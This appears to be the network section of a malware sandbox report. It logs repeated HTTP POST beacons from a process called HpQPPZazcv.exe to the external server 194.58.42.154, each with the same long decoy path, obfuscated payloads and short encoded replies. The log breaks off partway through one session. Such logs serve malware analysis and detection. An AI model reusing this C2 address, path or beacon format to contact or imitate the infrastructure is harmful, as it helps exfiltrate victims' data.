                                                                  Aug 1, 2024 04:28:34.565407038 CEST2512OUTData Raw: 5d 56 59 52 5f 46 57 58 5e 5a 5a 56 50 56 50 5d 55 5e 5c 59 54 5c 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]VYR_FWX^ZZVPVP]U^\YT\ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%^< "#7=3)),1W60(+$0 ,S+:!"7'&=9^/.]+
                                                                  Aug 1, 2024 04:28:35.019808054 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:35.197246075 CEST151INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:34 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  20192.168.2.449762194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:35.326060057 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:35.674948931 CEST2512OUTData Raw: 5d 55 59 53 5a 46 57 5a 5e 5a 5a 56 50 5c 50 59 55 53 5c 50 54 58 5a 50 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]UYSZFWZ^ZZVP\PYUS\PTXZPYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%<54?4=_(?-6+#_+;Z0."#>8U+)>7,3=9^/.]++
                                                                  Aug 1, 2024 04:28:36.118098021 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:36.252756119 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:35 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  21192.168.2.449763194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:38.058491945 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:38.409181118 CEST2512OUTData Raw: 5d 53 5c 56 5a 43 57 5e 5e 5a 5a 56 50 57 50 5b 55 50 5c 5a 54 5e 5a 5b 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]S\VZCW^^ZZVPWP[UP\ZT^Z[YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&+:7(Y)0=>?&#('^<#0.!T7R(.4Y0=9^/.]+
                                                                  Aug 1, 2024 04:28:38.885725975 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:39.024631977 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:38 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  22192.168.2.449764194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:39.082931995 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1960
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:39.441781998 CEST1960OUTData Raw: 58 52 5c 57 5f 43 57 5b 5e 5a 5a 56 50 5e 50 5d 55 56 5c 5b 54 5a 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XR\W_CW[^ZZVP^P]UV\[TZZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%+3=4?#=2Z(?:6+3\*(;^'>%P4/(*&#Q 0=9^/.]+3
                                                                  Aug 1, 2024 04:28:39.926704884 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:40.067157030 CEST380INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:39 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 57 22 1f 2a 02 37 3d 20 53 2d 5c 35 01 28 0d 0c 5b 2a 12 02 13 25 23 24 0a 3c 3e 3f 02 3d 3c 34 12 31 3d 33 0c 34 12 3d 55 2b 1c 2a 46 0c 10 25 5e 2b 3d 23 1d 25 01 28 0d 3a 09 3d 42 25 3e 19 10 21 3f 22 16 37 3b 27 05 3f 5e 28 56 27 17 24 51 3a 2d 26 5c 26 37 00 5a 21 25 2a 54 02 15 27 51 29 03 07 5b 26 31 37 01 25 2c 3b 53 26 2d 3d 5f 21 5a 2d 58 22 29 29 07 33 06 23 52 28 2d 2c 14 26 01 09 07 29 1f 21 53 23 2d 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &W"*7= S-\5([*%#$<>?=<41=34=U+*F%^+=#%(:=B%>!?"7;'?^(V'$Q:-&\&7Z!%*T'Q)[&17%,;S&-=_!Z-X"))3#R(-,&)!S#- P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  23192.168.2.449765194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:39.146636963 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:39.502939939 CEST2512OUTData Raw: 58 52 5c 52 5f 42 57 52 5e 5a 5a 56 50 5d 50 5f 55 50 5c 5c 54 50 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XR\R_BWR^ZZVP]P_UP\\TPZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&(%!,_=U!)/&6+(;+%.*#X<V(*%Y 48X09^/.]+/
                                                                  Aug 1, 2024 04:28:39.949520111 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:40.081511021 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:39 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  24192.168.2.449766194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:41.350894928 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:28:41.706020117 CEST2512OUTData Raw: 58 5f 5c 5f 5f 42 57 5d 5e 5a 5a 56 50 59 50 59 55 5f 5c 58 54 5b 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: X_\__BW]^ZZVPYPYU_\XT[Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X(-U#/7?#.[>&"]3?;+Y'>9Q"=;(*#7(_$-9^/.]+
                                                                  Aug 1, 2024 04:28:42.172766924 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:42.305392981 CEST151INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:42 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  25192.168.2.449767194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:42.493480921 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:42.848356009 CEST2512OUTData Raw: 5d 54 5c 56 5f 41 57 59 5e 5a 5a 56 50 5b 50 5e 55 54 5c 5d 54 50 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]T\V_AWY^ZZVP[P^UT\]TPZ\YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&?9W4<(]*#9*<!"$*8;^$-##<&"'^&=9^/.]+7
                                                                  Aug 1, 2024 04:28:43.289576054 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:43.468014956 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:43 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  26192.168.2.449768194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:44.604968071 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:44.956042051 CEST2512OUTData Raw: 58 5e 59 54 5f 43 52 58 5e 5a 5a 56 50 5d 50 51 55 55 5c 51 54 58 5a 5a 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: X^YT_CRX^ZZVP]PQUU\QTXZZYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%+U5V!< _=3&>!W"(?X<'_067<+*7''&=9^/.]+/


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  27192.168.2.449769194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:45.088018894 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 1996
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:45.442682028 CEST1996OUTData Raw: 5d 56 59 54 5f 4a 57 5e 5e 5a 5a 56 50 58 50 5d 55 5e 5c 59 54 5f 5a 5e 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]VYT_JW^^ZZVPXP]U^\YT_Z^YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&?#,4>1)?%Q68,+;#_'-& /<644 Y'-9^/.]+;
                                                                  Aug 1, 2024 04:28:45.895598888 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:46.023324013 CEST380INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:45 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Vary: Accept-Encoding
                                                                  Content-Length: 152
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 0e 1e 26 57 22 36 3e 07 23 10 28 56 3a 39 39 00 3c 0a 25 02 2a 3c 28 5a 30 20 38 0e 28 2d 38 5b 3d 2f 23 00 32 3e 20 12 23 3f 3e 0e 28 0c 2a 46 0c 10 26 06 3f 04 20 09 31 01 2c 0c 3a 0e 0f 43 31 10 3b 58 35 11 36 52 20 3b 02 58 28 38 19 0c 30 39 2c 1a 3a 00 26 16 31 37 04 59 21 35 2a 54 02 15 27 53 3d 5b 3e 06 33 31 2b 00 25 3c 24 0f 26 10 29 1d 35 2c 29 5b 22 39 35 06 27 38 0d 51 28 2e 0e 52 25 01 05 07 2a 32 3a 0b 21 17 20 50 2a 01 2c 57 00 35 57 54
                                                                  Data Ascii: &W"6>#(V:99<%*<(Z0 8(-8[=/#2> #?>(*F&? 1,:C1;X56R ;X(809,:&17Y!5*T'S=[>31+%<$&)5,)["95'8Q(.R%*2:! P*,W5WT


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  28192.168.2.449770194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:45.273287058 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:45.627814054 CEST2512OUTData Raw: 5d 56 59 56 5a 44 52 5e 5e 5a 5a 56 50 5d 50 5a 55 55 5c 50 54 5e 5a 5d 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]VYVZDR^^ZZVP]PZUU\PT^Z]YRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^&<&48_* .^=<5!;0(Z0.%Q#-8):9Z#44_09^/.]+/
                                                                  Aug 1, 2024 04:28:46.069933891 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:46.203649044 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:45 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  29192.168.2.449771194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:46.364351988 CEST478OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Aug 1, 2024 04:28:46.723465919 CEST2512OUTData Raw: 5d 54 5c 55 5f 42 57 53 5e 5a 5a 56 50 57 50 5c 55 52 5c 58 54 5b 5a 51 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: ]T\U_BWS^ZZVPWP\UR\XT[ZQYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%Z(3%# \>02]),68;]++$)48+Y7'^0=9^/.]+
                                                                  Aug 1, 2024 04:28:47.165344000 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:47.348716021 CEST151INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:47 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  30192.168.2.449772194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:47.944209099 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2504
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:48.300312996 CEST2504OUTData Raw: 58 51 5c 52 5a 43 57 58 5e 5a 5a 56 50 5e 50 58 55 53 5c 51 54 5e 5a 58 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
                                                                  Data Ascii: XQ\RZCWX^ZZVP^PXUS\QT^ZXYRXQU\Z[C^SY][V\^]RSUPUBZ\_RGXYPX^PSPQ[D[_A\_^USX^ZZG]B]YXV[S_X^^WT_]PUQQZXVWY__Z_G\^^DU]Y^[YY[Q^YT\ZUYVP^_WXS[YFT_[Z[Z_U[U_U\TYX__^U]QSYWY_WX[PPYQ]]ZY_[Y_PC^]^%X<#%U <;=\)5;3*+$>5W73?:&#74]3=9^/.]+'
                                                                  Aug 1, 2024 04:28:48.767235041 CEST25INHTTP/1.1 100 Continue
                                                                  Aug 1, 2024 04:28:48.945471048 CEST207INHTTP/1.1 200 OK
                                                                  Date: Thu, 01 Aug 2024 02:28:48 GMT
                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                  Content-Length: 4
                                                                  Keep-Alive: timeout=5, max=100
                                                                  Connection: Keep-Alive
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Data Raw: 3c 56 5f 5a
                                                                  Data Ascii: <V_Z


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  31192.168.2.449773194.58.42.154807860C:\Recovery\HpQPPZazcv.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Aug 1, 2024 04:28:49.306524038 CEST502OUTPOST /9Protonbase/Track/trackDatalife7Provider/Trafficlongpoll5process/Imagebigloadexternal/4ProcessMariadb/Eternal6bigload/4pollupdate/linux3Vm/Towp6/cpu_Generatorauth/18to_/mariadbgeneratorwindows/Track2Multi/8uploadsExternal/ProviderProcessprocessorlongpollTest.php HTTP/1.1
                                                                  Content-Type: application/octet-stream
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                  Host: 194.58.42.154
                                                                  Content-Length: 2512
                                                                  Expect: 100-continue
                                                                  Connection: Keep-Alive
                                                                  Aug 1, 2024 04:28:49.660434961 CEST2512OUTData Raw: 58 5f 5c 50 5a 44 57 5f 5e 5a 5a 56 50 5b 50 5e 55 54 5c 5f 54 51 5a 5c 59 52 58 51 55 5c 5a 5b 43 5e 53 59 5d 5b 56 5c 5e 5d 52 53 55 50 55 42 5a 5c 5f 52 47 58 59 50 58 5e 50 53 50 51 5b 44 5b 5f 41 5c 5f 5e 55 53 58 5e 5a 5a 47 5d 42 5d 59 58
